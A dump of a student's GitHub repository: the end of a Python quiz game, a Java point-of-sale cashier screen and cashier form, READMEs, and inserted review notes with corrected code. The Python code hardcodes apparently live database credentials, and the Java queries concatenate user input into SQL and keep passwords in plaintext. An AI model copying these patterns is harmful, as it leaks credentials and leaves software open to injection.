#---------------------------Database-------------------------------------------\n conn = connect(\"snlvedant.db.7623447.b14.hostedresource.net\", \"snlvedant\", \"VMMeducation@123\", \"snlvedant\")\n query = \"SELECT q_id FROM `kbc1` ORDER BY rand() LIMIT 0,16\"\n cr=conn.cursor()\n cr.execute(query)\n result=cr.fetchall()\n print(result)\n # --------------global-----------------------------------------------------------\n global id_data_list\n id_data_list.clear()\n\n global COUNTER\n global ANS_COUNT\n COUNTER=0\n ANS_COUNT=0\n #--------------------------\n for i in range(0,len(result)):\n id_data_list.append(result[i][0])\n\n # print(id_data_list)\n query2 = \"SELECT * FROM `kbc1` where q_id =\"+str(id_data_list[COUNTER])\n # print(query)\n cr1=conn.cursor()\n cr1.execute(query2)\n result1=cr1.fetchone()\n\n def demo():\n engine = pyttsx3.init()\n engine.setProperty('rate', 140) # setting up new voice rate\n engine.say(result1[1])\n sleep(1)\n engine.say(\"option A\")\n engine.say(result1[2])\n engine.say(\"option B\")\n engine.say(result1[3])\n engine.say(\"option C\")\n engine.say(result1[4])\n engine.say(\"option D\")\n engine.say(result1[5])\n engine.runAndWait()\n engine.stop()\n\n def demo2():\n t1 = threading.Thread(target=demo)\n t1.start()\n\n # print(result)\n # print(id_data_list)\n self.root.after(500,demo2)\n self.lb_question.config(text=result1[1])\n self.bt_option_A.config(text=result1[2])\n self.bt_option_B.config(text=result1[3])\n self.bt_option_C.config(text=result1[4])\n self.bt_option_D.config(text=result1[5])\n\n self.root.mainloop()\n\n\n# if __name__ == '__main__':\n# kbc3()\n"
},
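Note: the quiz handlers above interpolate `q_id` straight into SQL strings, re-open a database connection inside every callback, and the 50-50 handler indexes `result[0][0]` on a `SELECT *` row, which reads the first character of the id column rather than the stored answer letter; the `flip` method also shares its name with the `flip` Button, so `self.flip(state = 'disable')` fails once the attribute is rebound to the widget (it would need `self.flip.config(state='disabled')`). A minimal corrected sketch of the lookups, assuming the `kbc1` table with `q_id` and `ans` columns from the original; the host and credentials are placeholders:

```python
import random

import pymysql

def fetch_question(conn, question_id):
    # %s placeholders let the driver escape values instead of string-gluing.
    with conn.cursor() as cur:
        cur.execute("SELECT * FROM kbc1 WHERE q_id = %s", (question_id,))
        return cur.fetchone()

def fetch_answer(conn, question_id):
    # Select the answer column explicitly, so row[0] is the letter itself.
    with conn.cursor() as cur:
        cur.execute("SELECT ans FROM kbc1 WHERE q_id = %s", (question_id,))
        row = cur.fetchone()
        return row[0] if row else None

def fifty_fifty(conn, question_id):
    """Return two wrong options to disable, keeping the correct answer
    and one random wrong option on screen."""
    correct = fetch_answer(conn, question_id)       # e.g. 'B'
    wrong = [c for c in "ABCD" if c != correct]
    random.shuffle(wrong)
    return wrong[:2]

# Placeholder connection, opened once at startup and reused by the handlers:
# conn = pymysql.connect(host="localhost", user="user",
#                        password="secret", database="kbcdb")
```

Reusing one connection across handlers also removes the reconnect latency the original pays before every question.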
{
"alpha_fraction": 0.5540200471878052,
"alphanum_fraction": 0.5722548365592957,
"avg_line_length": 35.70664596557617,
"blob_id": "6322b667398a25c843928ab4026d852d39c87c08",
"content_id": "958a1e797ed26e4ef56798f174dde275ca800616",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Java",
"length_bytes": 22649,
"license_type": "no_license",
"max_line_length": 155,
"num_lines": 617,
"path": "/Point_Of_Sale-in_java/src/cashierhome.java",
"repo_name": "VedantMahajan99/personal-projects-2018-19",
"src_encoding": "UTF-8",
"text": "\nimport escpos.EscPos;\nimport escpos.EscPosConst;\nimport escpos.Style;\nimport java.sql.ResultSet;\nimport java.sql.SQLException;\nimport java.time.LocalDateTime;\nimport java.time.format.DateTimeFormatter;\nimport java.util.ArrayList;\nimport java.util.Date;\nimport java.util.logging.Level;\nimport java.util.logging.Logger;\nimport javax.print.PrintService;\nimport javax.swing.ImageIcon;\nimport javax.swing.JOptionPane;\nimport javax.swing.table.AbstractTableModel;\nimport output.PrinterOutputStream;\n\n/*\n * To change this license header, choose License Headers in Project Properties.\n * To change this template file, choose Tools | Templates\n * and open the template in the editor.\n */\n/**\n *\n * @author vedantmahajan\n */\npublic class cashierhome extends javax.swing.JFrame {\n\n /**\n * Creates new form cashierhome\n */\n ArrayList<mycart> cart = new ArrayList<>();\n\n int srno = 1, amount = 0, global_bid = -1;\n\n carttablemodel carttablemodel_obj;\n\n public cashierhome() {\n initComponents();\n\n setSize(1000, 1000);\n\n jPanel1.setVisible(false);\n\n lb_pid.setVisible(false);\n\n tf_net_total.setVisible(false);\n\n carttablemodel_obj = new carttablemodel();\n\n jTable1.setModel(carttablemodel_obj);\n }\n\n public class mycart {\n\n String pid, pname, price, qty, totalprice;\n\n int srno;\n\n mycart(int srno, String pid, String pname, String price, String qty, String totalprice) {\n this.srno = srno;\n\n this.pid = pid;\n\n this.pname = pname;\n\n this.price = price;\n\n this.qty = qty;\n\n this.totalprice = totalprice;\n\n }\n\n }\n\n /**\n * This method is called from within the constructor to initialize the form.\n * WARNING: Do NOT modify this code. The content of this method is always\n * regenerated by the Form Editor.\n */\n @SuppressWarnings(\"unchecked\")\n // <editor-fold defaultstate=\"collapsed\" desc=\"Generated Code\">//GEN-BEGIN:initComponents\n private void initComponents() {\n\n jLabel1 = new javax.swing.JLabel();\n tf_product_code = new javax.swing.JTextField();\n jButton1 = new javax.swing.JButton();\n jPanel1 = new javax.swing.JPanel();\n lb_product_photo = new javax.swing.JLabel();\n lb_product_name = new javax.swing.JLabel();\n lb_product_category = new javax.swing.JLabel();\n lb_product_price = new javax.swing.JLabel();\n lb_pid = new javax.swing.JLabel();\n jLabel6 = new javax.swing.JLabel();\n tf_quantity = new javax.swing.JTextField();\n jButton2 = new javax.swing.JButton();\n jLabel7 = new javax.swing.JLabel();\n tf_net_total = new javax.swing.JTextField();\n jScrollPane1 = new javax.swing.JScrollPane();\n jTable1 = new javax.swing.JTable();\n lb_amount = new javax.swing.JLabel();\n jButton3 = new javax.swing.JButton();\n jLabel2 = new javax.swing.JLabel();\n tf_mobile = new javax.swing.JTextField();\n jButton4 = new javax.swing.JButton();\n\n setDefaultCloseOperation(javax.swing.WindowConstants.EXIT_ON_CLOSE);\n getContentPane().setLayout(null);\n\n jLabel1.setText(\"ENTER PRODUCT CODE :\");\n getContentPane().add(jLabel1);\n jLabel1.setBounds(40, 36, 170, 30);\n getContentPane().add(tf_product_code);\n tf_product_code.setBounds(240, 40, 200, 26);\n\n jButton1.setText(\"SHOW\");\n jButton1.addActionListener(new java.awt.event.ActionListener() {\n public void actionPerformed(java.awt.event.ActionEvent evt) {\n jButton1ActionPerformed(evt);\n }\n });\n getContentPane().add(jButton1);\n jButton1.setBounds(500, 40, 82, 29);\n\n jPanel1.setLayout(null);\n\n lb_product_photo.setText(\"jLabel2\");\n jPanel1.add(lb_product_photo);\n 
lb_product_photo.setBounds(30, 30, 170, 160);\n\n lb_product_name.setText(\"jLabel3\");\n jPanel1.add(lb_product_name);\n lb_product_name.setBounds(260, 40, 180, 16);\n\n lb_product_category.setText(\"jLabel4\");\n jPanel1.add(lb_product_category);\n lb_product_category.setBounds(260, 100, 180, 16);\n\n lb_product_price.setText(\"jLabel5\");\n jPanel1.add(lb_product_price);\n lb_product_price.setBounds(260, 160, 200, 16);\n\n lb_pid.setText(\"jLabel2\");\n jPanel1.add(lb_pid);\n lb_pid.setBounds(420, 50, 45, 16);\n\n getContentPane().add(jPanel1);\n jPanel1.setBounds(40, 110, 550, 220);\n\n jLabel6.setText(\"ENTER QUANTITY : \");\n getContentPane().add(jLabel6);\n jLabel6.setBounds(60, 370, 160, 16);\n getContentPane().add(tf_quantity);\n tf_quantity.setBounds(270, 370, 190, 26);\n\n jButton2.setText(\"ADD TO CART\");\n jButton2.addActionListener(new java.awt.event.ActionListener() {\n public void actionPerformed(java.awt.event.ActionEvent evt) {\n jButton2ActionPerformed(evt);\n }\n });\n getContentPane().add(jButton2);\n jButton2.setBounds(590, 370, 160, 29);\n\n jLabel7.setText(\"NET TOTAL :\");\n getContentPane().add(jLabel7);\n jLabel7.setBounds(630, 450, 80, 16);\n\n tf_net_total.addActionListener(new java.awt.event.ActionListener() {\n public void actionPerformed(java.awt.event.ActionEvent evt) {\n tf_net_totalActionPerformed(evt);\n }\n });\n getContentPane().add(tf_net_total);\n tf_net_total.setBounds(270, 410, 190, 26);\n\n jTable1.setModel(new javax.swing.table.DefaultTableModel(\n new Object [][] {\n {null, null, null, null},\n {null, null, null, null},\n {null, null, null, null},\n {null, null, null, null}\n },\n new String [] {\n \"Title 1\", \"Title 2\", \"Title 3\", \"Title 4\"\n }\n ));\n jScrollPane1.setViewportView(jTable1);\n\n getContentPane().add(jScrollPane1);\n jScrollPane1.setBounds(20, 480, 760, 270);\n getContentPane().add(lb_amount);\n lb_amount.setBounds(720, 450, 60, 0);\n\n jButton3.setText(\"DELETE\");\n jButton3.addActionListener(new java.awt.event.ActionListener() {\n public void actionPerformed(java.awt.event.ActionEvent evt) {\n jButton3ActionPerformed(evt);\n }\n });\n getContentPane().add(jButton3);\n jButton3.setBounds(690, 750, 90, 29);\n\n jLabel2.setText(\"MOBILE NUMBER : \");\n getContentPane().add(jLabel2);\n jLabel2.setBounds(20, 760, 114, 16);\n\n tf_mobile.addActionListener(new java.awt.event.ActionListener() {\n public void actionPerformed(java.awt.event.ActionEvent evt) {\n tf_mobileActionPerformed(evt);\n }\n });\n getContentPane().add(tf_mobile);\n tf_mobile.setBounds(140, 750, 200, 40);\n\n jButton4.setText(\"CheckOUT\");\n jButton4.addActionListener(new java.awt.event.ActionListener() {\n public void actionPerformed(java.awt.event.ActionEvent evt) {\n jButton4ActionPerformed(evt);\n }\n });\n getContentPane().add(jButton4);\n jButton4.setBounds(350, 760, 110, 29);\n\n pack();\n }// </editor-fold>//GEN-END:initComponents\n\n private void tf_net_totalActionPerformed(java.awt.event.ActionEvent evt) {//GEN-FIRST:event_tf_net_totalActionPerformed\n // TODO add your handling code here:\n }//GEN-LAST:event_tf_net_totalActionPerformed\n\n private void jButton2ActionPerformed(java.awt.event.ActionEvent evt) {//GEN-FIRST:event_jButton2ActionPerformed\n\n int quantity = Integer.parseInt(tf_quantity.getText());\n\n int total = (quantity * Integer.parseInt(lb_product_price.getText()));\n\n String Total = Integer.toString(total);\n\n tf_net_total.setText(Total);\n\n cart.add(new mycart(srno, lb_pid.getText(), lb_product_name.getText(), 
lb_product_price.getText(), tf_quantity.getText(), tf_net_total.getText()));\n\n srno++;\n\n amount = amount + total;\n\n String Amount = Integer.toString(amount);\n\n lb_amount.setText(Amount);\n\n carttablemodel_obj.fireTableDataChanged();\n\n }//GEN-LAST:event_jButton2ActionPerformed\n\n private void jButton1ActionPerformed(java.awt.event.ActionEvent evt) {//GEN-FIRST:event_jButton1ActionPerformed\n\n ResultSet resultset_obj = DBLoader.executeQuery(\"select * from product where Barcode='\" + tf_product_code.getText() + \"'\");\n\n try {\n if (resultset_obj.next()) {\n jPanel1.setVisible(true);\n\n String pid = Integer.toString(resultset_obj.getInt(\"PID\"));\n\n lb_pid.setText(pid);\n\n lb_product_name.setText(resultset_obj.getString(\"Name\"));\n\n lb_product_category.setText(resultset_obj.getString(\"Category\"));\n\n lb_product_price.setText(resultset_obj.getString(\"Price\"));\n\n String photopath = resultset_obj.getString(\"Photo\");\n\n lb_product_photo.setIcon(new ImageIcon(photopath));\n\n }\n } catch (SQLException ex) {\n Logger.getLogger(cashierhome.class.getName()).log(Level.SEVERE, null, ex);\n }\n\n\n }//GEN-LAST:event_jButton1ActionPerformed\n\n private void jButton3ActionPerformed(java.awt.event.ActionEvent evt) {//GEN-FIRST:event_jButton3ActionPerformed\n\n int rowselected = jTable1.getSelectedRow();\n\n if (rowselected < 0) {\n JOptionPane.showMessageDialog(rootPane, \"No Row Selected !\");\n } else {\n int serialnumber = cart.get(rowselected).srno;\n\n// try \n {\n cart.remove(serialnumber - 1);\n\n// resultset_obj.next();\n// \n// resultset_obj.deleteRow();\n }\n// catch (SQLException ex) \n// {\n// Logger.getLogger(category.class.getName()).log(Level.SEVERE, null, ex);\n// }\n\n carttablemodel_obj.fireTableDataChanged();\n// \n// getcategory();\n }\n\n }//GEN-LAST:event_jButton3ActionPerformed\n\n private void tf_mobileActionPerformed(java.awt.event.ActionEvent evt) {//GEN-FIRST:event_tf_mobileActionPerformed\n // TODO add your handling code here:\n }//GEN-LAST:event_tf_mobileActionPerformed\n\n private void jButton4ActionPerformed(java.awt.event.ActionEvent evt) {//GEN-FIRST:event_jButton4ActionPerformed\n\n DateTimeFormatter dtf = DateTimeFormatter.ofPattern(\"yyyy/MM/dd HH:mm:ss\");\n LocalDateTime now = LocalDateTime.now();\n System.out.println(dtf.format(now));\n\n String date = dtf.format(now);\n\n String mobile_number = tf_mobile.getText();\n\n String grand_total = lb_amount.getText();\n\n ResultSet resultset_obj1 = DBLoader.executeQuery(\"select * from bill\");\n\n try {\n resultset_obj1.moveToInsertRow();\n\n resultset_obj1.updateString(\"Date_of_bill\", date);\n\n resultset_obj1.updateString(\"Mobile\", mobile_number);\n\n resultset_obj1.updateString(\"Grand_total\", grand_total);\n resultset_obj1.insertRow();\n } catch (SQLException ex) {\n Logger.getLogger(cashierhome.class.getName()).log(Level.SEVERE, null, ex);\n }\n\n ResultSet resultset_obj2 = DBLoader.executeQuery(\"select max(BID) BID from bill\");\n\n try {\n if (resultset_obj2.next()) {\n int j = 0;\n\n global_bid = resultset_obj2.getInt(\"BID\");\n\n for (int i = 0; i < cart.size(); i++) {\n mycart mycart_object = cart.get(i);\n ResultSet resultset_obj3 = DBLoader.executeQuery(\"select * from bill_details\");\n\n resultset_obj3.moveToInsertRow();\n\n resultset_obj3.updateInt(\"bid\", global_bid);\n\n resultset_obj3.updateString(\"pid\", mycart_object.pid);\n\n resultset_obj3.updateString(\"pname\", mycart_object.pname);\n\n resultset_obj3.updateString(\"price\", mycart_object.price);\n\n 
resultset_obj3.updateString(\"qty\", mycart_object.qty);\n\n resultset_obj3.updateString(\"totalprice\", mycart_object.totalprice);\n resultset_obj3.insertRow();\n\n }\n JOptionPane.showMessageDialog(rootPane, \"order placed, collect your bill..\");\n getbillprited();\n }\n } catch (SQLException ex) {\n Logger.getLogger(cashierhome.class.getName()).log(Level.SEVERE, null, ex);\n }\n\n\n }//GEN-LAST:event_jButton4ActionPerformed\n\n class carttablemodel extends AbstractTableModel {\n\n @Override\n public int getRowCount() {\n return cart.size();\n }\n\n @Override\n public int getColumnCount() {\n return 6;\n }\n\n @Override\n public Object getValueAt(int i, int j) {\n mycart mycart_object = cart.get(i);\n\n if (j == 0) {\n return mycart_object.srno;\n } else if (j == 1) {\n return mycart_object.pid;\n } else if (j == 2) {\n return mycart_object.pname;\n } else if (j == 3) {\n return mycart_object.price;\n } else if (j == 4) {\n return mycart_object.qty;\n } else if (j == 5) {\n return mycart_object.totalprice;\n } else {\n return null;\n\n }\n\n }\n\n @Override\n public String getColumnName(int j) {\n String col[] = {\"SRNO\", \"PID\", \"Name\", \"Price\", \"Quantity\", \"Total Price\"};\n\n return col[j];\n }\n\n }\n\n void getbillprited() {\n\n try {\n\n PrintService printService = PrinterOutputStream.getPrintServiceByName(\"THERMAL Receipt Printer\");\n PrinterOutputStream printerOutputStream = new PrinterOutputStream(printService);\n EscPos escpos = new EscPos(printerOutputStream);\n Style header = new Style()\n .setFontSize(Style.FontSize._2, Style.FontSize._2)\n .setJustification(EscPosConst.Justification.Center)\n .setBold(true)\n .setColorMode(Style.ColorMode.WhiteOnBlack);\n\n Style address = new Style()\n .setFontName(Style.FontName.Font_A_Default)\n .setFontSize(Style.FontSize._1, Style.FontSize._1)\n .setJustification(EscPosConst.Justification.Center);\n escpos.writeLF(header, \"Point of Sale\");\n escpos.writeLF(address, \"SCO-108, Ranjeet Avenue\");\n escpos.writeLF(address, \"+918725983606\");\n escpos.writeLF(address, \"GSTIN : 23AADGS334SDZDT\");\n escpos.writeLF(address, \"Vat No : 94832848349\");\n escpos.writeLF(address, new Date() + \"\");\n// escpos.writeLF(address, \"Table No. 
120\");\n escpos.writeLF(address, \" \");\n escpos.writeLF(address, \" \");\n\n// QRCode qrCode = new QRCode()\n// .setSize(5)\n// .setModel(QRCode.QRModel._2)\n// .setJustification(EscPosConst.Justification.Center);\n//\n// escpos.write(qrCode, \"QR Code\");\n//\n// escpos.writeLF(address, \" \");\n// BarCode barcode = new BarCode();\n// barcode.setJustification(EscPosConst.Justification.Center);\n// barcode.setHRIPosition(BarCode.BarCodeHRIPosition.BelowBarCode);\n// escpos.write(barcode, tfbarcode.getText());\n// GraphicsImageWrapper imageWrapper = new GraphicsImageWrapper();\n// imageWrapper.setJustification(EscPosConst.Justification.Center);\n// \n// BitonalThreshold bod = new BitonalThreshold();\n// BufferedImage bimg = ImageIO.read(new File(\"src/images/goku.png\"));\n// EscPosImage escPos = new EscPosImage(bimg, bod);\n// escpos.write(imageWrapper, escPos);\n//\n//// BitonalThreshold bt = new BitonalThreshold();\n Style lineStyle = new Style()\n .setFontSize(Style.FontSize._1, Style.FontSize._1)\n .setJustification(EscPosConst.Justification.Center);\n\n Style rightText = new Style()\n .setFontSize(Style.FontSize._1, Style.FontSize._1)\n .setJustification(EscPosConst.Justification.Right);\n\n Style leftText = new Style()\n .setFontSize(Style.FontSize._1, Style.FontSize._1)\n .setJustification(EscPosConst.Justification.Left_Default)\n .resetLineSpacing();\n Style justifiedText = new Style()\n .setFontSize(Style.FontSize._1, Style.FontSize._1)\n .setJustification(EscPosConst.Justification.Center);\n\n escpos.writeLF(rightText, \"Bill No : \" + global_bid);\n escpos.writeLF(leftText, \"Cashier: casher1\");\n\n escpos.writeLF(lineStyle, \"----------------------------------------\");\n escpos.writeLF(\"Item Rate Qty Price\");\n System.out.println(\"Item Rate Qty Price\");\n escpos.writeLF(lineStyle, \"----------------------------------------\");\n for (int i = 0; i < cart.size(); i++) {\n\n String name = cart.get(i).pname;\n\n if (name.length() == 6) {\n name = name + \" \";\n } else if (name.length() == 7) {\n name = name + \" \";\n } else if (name.length() == 8) {\n\n name = name + \" \";\n\n } else if (name.length() == 9) {\n name = name + \" \";\n } else if (name.length() == 10) {\n name = name + \" \";\n } else if (name.length() == 11) {\n name = name + \" \";\n } else if (name.length() == 12) {\n name = name + \" \";\n } else if (name.length() == 13) {\n name = name + \" \";\n } else if (name.length() == 14) {\n name = name + \" \";\n } else if (name.length() == 15) {\n name = name + \" \";\n } else if (name.length() == 16) {\n name = name + \" \";\n } else if (name.length() == 17) {\n name = name + \" \";\n } else if (name.length() == 18) {\n name = name + \" \";\n } else {\n name = name + \" \";\n }\n\n escpos.write(leftText, name + \"\" + cart.get(i) + \" \" + cart.get(i).qty + \" \" + cart.get(i).totalprice);\n\n escpos.writeLF(\"\");\n\n System.out.print(cart.get(i).pname);\n System.out.print(cart.get(i).price + \" \" + cart.get(i).qty + \" \" + cart.get(i).totalprice);\n System.out.println(\"\");\n }\n escpos.writeLF(lineStyle, \"----------------------------------------\");\n escpos.write(justifiedText, \"Net Payable: \" + lb_amount.getText());\n\n// Style justifiedText = new Style()\n// .setFontSize(Style.FontSize._1, Style.FontSize._1)\n// .setJustification(EscPosConst.Justification.Left_Default);\n escpos.feed(5);\n escpos.cut(EscPos.CutMode.PART);\n escpos.close();\n\n } catch (Exception e) {\n System.out.println(e.getMessage());\n }\n }\n\n /**\n * @param args the 
command line arguments\n */\n public static void main(String args[]) {\n /* Set the Nimbus look and feel */\n //<editor-fold defaultstate=\"collapsed\" desc=\" Look and feel setting code (optional) \">\n /* If Nimbus (introduced in Java SE 6) is not available, stay with the default look and feel.\n * For details see http://download.oracle.com/javase/tutorial/uiswing/lookandfeel/plaf.html \n */\n try {\n for (javax.swing.UIManager.LookAndFeelInfo info : javax.swing.UIManager.getInstalledLookAndFeels()) {\n if (\"Nimbus\".equals(info.getName())) {\n javax.swing.UIManager.setLookAndFeel(info.getClassName());\n break;\n }\n }\n } catch (ClassNotFoundException ex) {\n java.util.logging.Logger.getLogger(cashierhome.class.getName()).log(java.util.logging.Level.SEVERE, null, ex);\n } catch (InstantiationException ex) {\n java.util.logging.Logger.getLogger(cashierhome.class.getName()).log(java.util.logging.Level.SEVERE, null, ex);\n } catch (IllegalAccessException ex) {\n java.util.logging.Logger.getLogger(cashierhome.class.getName()).log(java.util.logging.Level.SEVERE, null, ex);\n } catch (javax.swing.UnsupportedLookAndFeelException ex) {\n java.util.logging.Logger.getLogger(cashierhome.class.getName()).log(java.util.logging.Level.SEVERE, null, ex);\n }\n //</editor-fold>\n\n /* Create and display the form */\n java.awt.EventQueue.invokeLater(new Runnable() {\n public void run() {\n new cashierhome().setVisible(true);\n }\n });\n }\n\n // Variables declaration - do not modify//GEN-BEGIN:variables\n private javax.swing.JButton jButton1;\n private javax.swing.JButton jButton2;\n private javax.swing.JButton jButton3;\n private javax.swing.JButton jButton4;\n private javax.swing.JLabel jLabel1;\n private javax.swing.JLabel jLabel2;\n private javax.swing.JLabel jLabel6;\n private javax.swing.JLabel jLabel7;\n private javax.swing.JPanel jPanel1;\n private javax.swing.JScrollPane jScrollPane1;\n private javax.swing.JTable jTable1;\n private javax.swing.JLabel lb_amount;\n private javax.swing.JLabel lb_pid;\n private javax.swing.JLabel lb_product_category;\n private javax.swing.JLabel lb_product_name;\n private javax.swing.JLabel lb_product_photo;\n private javax.swing.JLabel lb_product_price;\n private javax.swing.JTextField tf_mobile;\n private javax.swing.JTextField tf_net_total;\n private javax.swing.JTextField tf_product_code;\n private javax.swing.JTextField tf_quantity;\n // End of variables declaration//GEN-END:variables\n}\n"
},
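Note: in `getbillprited()` above, item names are padded to a receipt column with an eleven-branch if/else ladder, and the printed line concatenates `cart.get(i)` (the object's default `toString`) where the price field is clearly intended, as the adjacent `System.out` call shows. A sketch of the same fixed-width line using format specifiers; the column widths here are illustrative assumptions, not values from the source:

```python
def receipt_line(name, rate, qty, total, name_width=20):
    # Left-justify (and truncate) the name, right-align the numeric columns;
    # this replaces the per-length if/else padding chain.
    return f"{name[:name_width]:<{name_width}}{rate:>8}{qty:>5}{total:>8}"

print(receipt_line("Milk", "45", "2", "90"))
print(receipt_line("A very long product name", "120", "1", "120"))
```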
{
"alpha_fraction": 0.698630154132843,
"alphanum_fraction": 0.7465753555297852,
"avg_line_length": 15.222222328186035,
"blob_id": "2676825923a7c6f3ee95bef34b1d1f1d08bc98d6",
"content_id": "ea1c9179e41ef3dee3b9a616d662f5717b6d4491",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 146,
"license_type": "no_license",
"max_line_length": 41,
"num_lines": 9,
"path": "/README.md",
"repo_name": "VedantMahajan99/personal-projects-2018-19",
"src_encoding": "UTF-8",
"text": "# personal-projects\n\nProjects done in summer of 2018\n\n1: Point of sale in java\n\n2: Who wants to be a millionare in python\n\n3: Team Viewer in java\n"
},
{
"alpha_fraction": 0.807692289352417,
"alphanum_fraction": 0.807692289352417,
"avg_line_length": 103,
"blob_id": "3c309a43e6efe1c1bf3f6f84a9f7ad027dfd7631",
"content_id": "2c5b7226f6fa3569018d480ace3579440472728a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 312,
"license_type": "no_license",
"max_line_length": 294,
"num_lines": 3,
"path": "/Point_Of_Sale-in_java/README.md",
"repo_name": "VedantMahajan99/personal-projects-2018-19",
"src_encoding": "UTF-8",
"text": "# Point_Of_Sale\n\nPoint of Sale in Java. Via this desktop app the merchant calculates the amount owed by the customer, indicates that amount, may prepare an invoice for the customer. User can save information regarding product, categories, client information and can print out a bill when client is done shopping\n"
},
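A minimal sketch of the bill arithmetic this README describes; the field names mirror the `mycart` rows kept in `cashierhome.java`, and the values are made up:

```python
cart = [
    {"pname": "Milk",  "price": 45, "qty": 2},
    {"pname": "Bread", "price": 30, "qty": 1},
]
line_totals = [item["price"] * item["qty"] for item in cart]  # [90, 30]
grand_total = sum(line_totals)  # the amount owed shown on the bill
print(grand_total)  # 120
```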
{
"alpha_fraction": 0.553998589515686,
"alphanum_fraction": 0.5664048790931702,
"avg_line_length": 31.85337257385254,
"blob_id": "10ce0bee86d72c2804842127c1d8aa6a62f15c87",
"content_id": "26449e5c1a4ceff1c7bfbbdd9864863f824d3f2d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Java",
"length_bytes": 11204,
"license_type": "no_license",
"max_line_length": 153,
"num_lines": 341,
"path": "/Point_Of_Sale-in_java/src/cashier.java",
"repo_name": "VedantMahajan99/personal-projects-2018-19",
"src_encoding": "UTF-8",
"text": "\nimport java.io.File;\nimport java.sql.ResultSet;\nimport java.sql.SQLException;\nimport java.util.ArrayList;\nimport java.util.Date;\nimport java.util.logging.Level;\nimport java.util.logging.Logger;\nimport javax.swing.JOptionPane;\nimport javax.swing.table.AbstractTableModel;\n\n/*\n * To change this license header, choose License Headers in Project Properties.\n * To change this template file, choose Tools | Templates\n * and open the template in the editor.\n */\n\n/**\n *\n * @author vedantmahajan\n */\npublic class cashier extends javax.swing.JFrame {\n\n /**\n * Creates new form cashier\n */\n \n ArrayList<cashierinfo> cashierList = new ArrayList<>();\n \n cashiertablemodel cashiertablemodel_obj;\n \n public cashier() {\n initComponents();\n \n cashiertablemodel_obj = new cashiertablemodel();\n \n jTable1.setModel(cashiertablemodel_obj);\n \n getcashier();\n }\n \n \n public void getcashier()\n {\n ResultSet resultset_obj = DBLoader.executeQuery(\"select * from cashier\");\n \n try {\n while(resultset_obj.next())\n {\n cashierList.add(new cashierinfo(resultset_obj.getInt(\"CID\") , resultset_obj.getString(\"Username\"), resultset_obj.getString(\"Password\")));\n \n jTable1.setRowHeight(100);\n \n cashiertablemodel_obj.fireTableDataChanged();\n \n }\n } \n \n catch (SQLException ex) {\n Logger.getLogger(cashier.class.getName()).log(Level.SEVERE, null, ex);\n }\n \n \n }\n\n /**\n * This method is called from within the constructor to initialize the form.\n * WARNING: Do NOT modify this code. The content of this method is always\n * regenerated by the Form Editor.\n */\n @SuppressWarnings(\"unchecked\")\n // <editor-fold defaultstate=\"collapsed\" desc=\"Generated Code\">//GEN-BEGIN:initComponents\n private void initComponents() {\n\n jLabel1 = new javax.swing.JLabel();\n jLabel2 = new javax.swing.JLabel();\n tf_cashier_username = new javax.swing.JTextField();\n jLabel3 = new javax.swing.JLabel();\n tf_cashier_pass = new javax.swing.JTextField();\n jButton1 = new javax.swing.JButton();\n jScrollPane1 = new javax.swing.JScrollPane();\n jTable1 = new javax.swing.JTable();\n jButton2 = new javax.swing.JButton();\n\n setDefaultCloseOperation(javax.swing.WindowConstants.EXIT_ON_CLOSE);\n getContentPane().setLayout(null);\n\n jLabel1.setText(\"NEW CASHIER\");\n getContentPane().add(jLabel1);\n jLabel1.setBounds(70, 30, 170, 50);\n\n jLabel2.setText(\"USERNAME :\");\n getContentPane().add(jLabel2);\n jLabel2.setBounds(20, 110, 110, 16);\n\n tf_cashier_username.addActionListener(new java.awt.event.ActionListener() {\n public void actionPerformed(java.awt.event.ActionEvent evt) {\n tf_cashier_usernameActionPerformed(evt);\n }\n });\n getContentPane().add(tf_cashier_username);\n tf_cashier_username.setBounds(160, 100, 90, 26);\n\n jLabel3.setText(\"PASSWORD :\");\n getContentPane().add(jLabel3);\n jLabel3.setBounds(20, 190, 100, 16);\n\n tf_cashier_pass.addActionListener(new java.awt.event.ActionListener() {\n public void actionPerformed(java.awt.event.ActionEvent evt) {\n tf_cashier_passActionPerformed(evt);\n }\n });\n getContentPane().add(tf_cashier_pass);\n tf_cashier_pass.setBounds(160, 180, 90, 26);\n\n jButton1.setText(\"ADD\");\n jButton1.addActionListener(new java.awt.event.ActionListener() {\n public void actionPerformed(java.awt.event.ActionEvent evt) {\n jButton1ActionPerformed(evt);\n }\n });\n getContentPane().add(jButton1);\n jButton1.setBounds(80, 260, 75, 29);\n\n jTable1.setModel(new javax.swing.table.DefaultTableModel(\n new Object [][] {\n {null, null, null, 
null},\n {null, null, null, null},\n {null, null, null, null},\n {null, null, null, null}\n },\n new String [] {\n \"Title 1\", \"Title 2\", \"Title 3\", \"Title 4\"\n }\n ));\n jScrollPane1.setViewportView(jTable1);\n\n getContentPane().add(jScrollPane1);\n jScrollPane1.setBounds(460, 50, 360, 340);\n\n jButton2.setText(\"DELETE\");\n jButton2.addActionListener(new java.awt.event.ActionListener() {\n public void actionPerformed(java.awt.event.ActionEvent evt) {\n jButton2ActionPerformed(evt);\n }\n });\n getContentPane().add(jButton2);\n jButton2.setBounds(620, 420, 90, 29);\n\n pack();\n }// </editor-fold>//GEN-END:initComponents\n\n private void tf_cashier_usernameActionPerformed(java.awt.event.ActionEvent evt) {//GEN-FIRST:event_tf_cashier_usernameActionPerformed\n // TODO add your handling code here:\n }//GEN-LAST:event_tf_cashier_usernameActionPerformed\n\n private void tf_cashier_passActionPerformed(java.awt.event.ActionEvent evt) {//GEN-FIRST:event_tf_cashier_passActionPerformed\n // TODO add your handling code here:\n }//GEN-LAST:event_tf_cashier_passActionPerformed\n\n private void jButton1ActionPerformed(java.awt.event.ActionEvent evt) {//GEN-FIRST:event_jButton1ActionPerformed\n \n if((tf_cashier_username.getText() == null) || (tf_cashier_pass.getText() == null))\n {\n JOptionPane.showMessageDialog(rootPane, \"ALL FIELDS ARE NECESSARY !\");\n }\n else\n {\n \n try\n {\n ResultSet resultset_obj = DBLoader.executeQuery(\"select * from cashier where Username='\"+tf_cashier_username.getText()+\"'\");\n \n if(resultset_obj.next())\n {\n \n JOptionPane.showMessageDialog(rootPane, \"Cashier already exists\");\n \n }\n else\n {\n \n resultset_obj.moveToInsertRow();\n \n resultset_obj.updateString(\"Username\", tf_cashier_username.getText());\n \n resultset_obj.updateString(\"Password\", tf_cashier_pass.getText());\n \n 